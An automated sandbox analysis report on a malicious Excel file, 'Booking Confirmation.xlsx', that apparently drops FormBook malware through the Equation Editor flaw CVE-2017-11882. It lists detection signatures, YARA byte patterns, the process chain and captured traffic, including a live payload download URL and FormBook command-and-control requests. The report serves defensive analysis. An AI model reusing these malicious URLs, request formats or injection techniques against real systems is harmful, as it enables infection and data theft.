Analysis Report Booking Confirmation.xlsx

Overview

General Information

Sample Name: Booking Confirmation.xlsx
Analysis ID: 323046
MD5: 97ee696e60901ec520c93f0e8b29b956
SHA1: 89780a503e1b57b7d224feb43c5db4db60ede9ff
SHA256: 2f2cf9a7f17157fbf03d37450588c9a1396535874097c29d7b12e512295f85ec
Tags: Formbook, VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2448 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2536 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2884 cmdline: 'C:\Users\Public\vbc.exe' MD5: 5DEDC928F9F5E3A4C59490E79BCF0773)
      • RegSvcs.exe (PID: 2344 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 62CE5EF995FD63A1847A196C2E8B267B)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • raserver.exe (PID: 3024 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 0842FB9AC27460E2B0107F6B3A872FD5)
            • cmd.exe (PID: 3004 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000002.2189231166.00000000023CF000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group |
  • 0x183f9:$sqlite3step: 68 34 1C 7B E1
  • 0x1850c:$sqlite3step: 68 34 1C 7B E1
  • 0x18428:$sqlite3text: 68 38 2A 90 C5
  • 0x1854d:$sqlite3text: 68 38 2A 90 C5
  • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
5.2.RegSvcs.exe.400000.1.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
5.2.RegSvcs.exe.400000.1.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.RegSvcs.exe.400000.1.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group |
  • 0x175f9:$sqlite3step: 68 34 1C 7B E1
  • 0x1770c:$sqlite3step: 68 34 1C 7B E1
  • 0x17628:$sqlite3text: 68 38 2A 90 C5
  • 0x1774d:$sqlite3text: 68 38 2A 90 C5
  • 0x1763b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17763:$sqlite3blob: 68 53 D8 7F 8C
5.2.RegSvcs.exe.400000.1.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
5.2.RegSvcs.exe.400000.1.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2536, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2884
Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection, Author: Joe Security, Data: DestinationIp: 103.125.191.5, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2536, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2536, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
Sigma detected: Executables Started in Suspicious Folder
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2536, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2884
Sigma detected: Execution in Non-Executable Folder
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2536, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2884
Sigma detected: Suspicious Program Location Process Starts
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2536, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2884

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu/worksdoc/svchost.exe, Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe, ReversingLabs: Detection: 25%
Source: C:\Users\Public\vbc.exe, ReversingLabs: Detection: 25%
Multi AV Scanner detection for submitted file
Source: Booking Confirmation.xlsx, Virustotal: Detection: 31%
Source: Booking Confirmation.xlsx, ReversingLabs: Detection: 25%
Yara detected FormBook
Source: Yara match, File source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 5.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: 5.2.RegSvcs.exe.400000.1.unpack, Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\Public\vbc.exe
Source: unknown, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4x nop then pop esi, 5_2_00417295
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4x nop then pop esi, 5_2_004172A5
Source: C:\Windows\SysWOW64\raserver.exe, Code function: 4x nop then pop esi, 7_2_00137295
Source: C:\Windows\SysWOW64\raserver.exe, Code function: 4x nop then pop esi, 7_2_001372A5
Source: global traffic, DNS query: name: workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu
Source: global traffic, TCP traffic: 192.168.2.22:49165 -> 103.125.191.5:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49165 -> 103.125.191.5:80
Source: Traffic, Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.22:49167
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 200 OK
  Date: Thu, 26 Nov 2020 08:03:38 GMT
  Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
  Last-Modified: Wed, 25 Nov 2020 23:15:49 GMT
  ETag: "de000-5b4f69ba08c46"
  Accept-Ranges: bytes
  Content-Length: 909312
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: application/x-msdownload
Source: global traffic, HTTP traffic detected:
  GET /kgw/?FN=-ZD4lhJxcp08lll&YPxdA=D+Ti5aR1Wzy55HWIHky6cyQTuFVn7YolhMhL9zo9Uhy0mVzlryEZIhtqzRusDBhtj2h8Dg== HTTP/1.1
  Host: www.affinitymotorsales.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic, HTTP traffic detected:
  GET /kgw/?YPxdA=qxnbG0TgnGHGw+QslghqCPaDw7mfFbPu6Z/l2x9tLypy5Il4TL/Oe56TI1g3tXVevJbT7w==&FN=-ZD4lhJxcp08lll HTTP/1.1
  Host: www.setyourhead.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View, IP Address: 103.125.191.5
Source: Joe Sandbox View, IP Address: 34.102.136.180
Source: Joe Sandbox View, ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Source: Joe Sandbox View, ASN Name: WEBAIR-INTERNETUS
Source: global traffic, HTTP traffic detected:
  GET /worksdoc/svchost.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu
  Connection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1631DAC0.emf
Source: unknown, DNS traffic detected: queries for: workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu
            Source: explorer.exe, 00000006.00000000.2197607706.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
            Source: explorer.exe, 00000006.00000000.2192186293.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
            Source: vbc.exe, 00000004.00000002.2189207331.0000000002371000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
            Source: explorer.exe, 00000006.00000000.2209444935.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
